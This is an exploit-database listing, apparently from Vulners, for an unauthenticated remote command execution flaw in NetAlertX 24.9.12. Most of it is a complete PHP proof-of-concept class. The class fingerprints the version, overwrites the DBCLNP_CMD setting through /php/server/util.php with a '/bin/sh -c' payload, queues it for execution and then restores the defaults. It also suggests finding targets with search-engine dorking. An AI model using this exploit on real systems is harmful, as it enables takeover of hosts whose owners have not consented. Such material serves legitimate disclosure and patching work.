Vulners
Lucene search
NetAlertX 24.9.12 Code Execution
=============================================================================================================================================
| # Title : NetAlertX 24.9.12 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://netalertx.com/ |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] An RCE (Remote Command Execution) exploit targeting NetAlertX, where an attacker can update settings without authentication, leading to command execution on the system.
[+] save code as poc.php .
[+] USage : cmd => c:\www\test\php poc.php
[+] SeT target = Line : 111
[+] PayLoad :
<?php
class NetAlertXExploit {
private $target;
private $port;
private $waitTime;
private $cleanup;
private $baseUrl;
public function __construct($target, $port = 20211, $waitTime = 75, $cleanup = true) {
$this->target = $target;
$this->port = $port;
$this->waitTime = $waitTime;
$this->cleanup = $cleanup;
$this->baseUrl = "http://$target:$port";
}
private function sendRequest($method, $uri, $data = null) {
$url = "{$this->baseUrl}$uri";
$options = [
'http' => [
'method' => $method,
'header' => "Content-Type: application/json\r\n",
'ignore_errors' => true
]
];
if ($data) {
$options['http']['content'] = json_encode($data);
}
return file_get_contents($url, false, stream_context_create($options));
}
public function check() {
echo "[*] Checking if target is vulnerable...\n";
$res = $this->sendRequest("GET", "/maintenance.php");
if (!$res) {
echo "[-] Target is not reachable.\n";
return false;
}
preg_match('/Installed version.*?([\d.]+)/', $res, $matches);
if (!$matches) {
echo "[-] Failed to detect version.\n";
return false;
}
$version = $matches[1];
if (version_compare($version, "23.01.14", ">=") && version_compare($version, "24.9.12", "<=")) {
echo "[+] Vulnerable version detected: $version\n";
return true;
}
echo "[-] Target is not vulnerable (Version: $version).\n";
return false;
}
public function exploit($cmd) {
echo "[*] Exploiting target...\n";
$payload = "/bin/sh -c \"$cmd\"";
$this->updateSettings($payload, "*");
echo "[*] Waiting for settings update...\n";
sleep($this->waitTime);
echo "[*] Adding payload to execution queue...\n";
$this->addToExecutionQueue("run|DBCLNP");
$this->addToExecutionQueue("cron_restart_backend");
echo "[+] Payload sent successfully!\n";
}
private function updateSettings($cmd, $schedule) {
$data = [
'function' => 'savesettings',
'settings' => [
['DBCLNP', 'DBCLNP_RUN', 'string', 'schedule'],
['DBCLNP', 'DBCLNP_CMD', 'string', $cmd],
['DBCLNP', 'DBCLNP_RUN_SCHD', 'string', "$schedule * * * *"],
]
];
$res = $this->sendRequest("POST", "/php/server/util.php", $data);
if (!$res) {
die("[-] Failed to update settings.\n");
}
echo "[+] DBCLNP_CMD updated to '$cmd'.\n";
}
private function addToExecutionQueue($cmd) {
$data = [
'function' => 'addToExecutionQueue',
'action' => uniqid() . "|$cmd"
];
$res = $this->sendRequest("POST", "/php/server/util.php", $data);
if (!$res) {
die("[-] Failed to add payload to execution queue.\n");
}
}
public function cleanup() {
if (!$this->cleanup) return;
echo "[*] Restoring original settings...\n";
$defaultCmd = 'python3 /app/front/plugins/db_cleanup/script.py pluginskeephistory={pluginskeephistory} hourstokeepnewdevice={hourstokeepnewdevice} daystokeepevents={daystokeepevents} pholuskeepdays={pholuskeepdays}';
$this->updateSettings($defaultCmd, "*/30");
echo "[+] Cleanup completed.\n";
}
}
// الاستخدام
$target = "192.168.1.100";
$exploit = new NetAlertXExploit($target);
if ($exploit->check()) {
$exploit->exploit("id");
$exploit->cleanup();
}
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Feb 2025 00:00Current
7.9High risk
Vulners AI Score7.9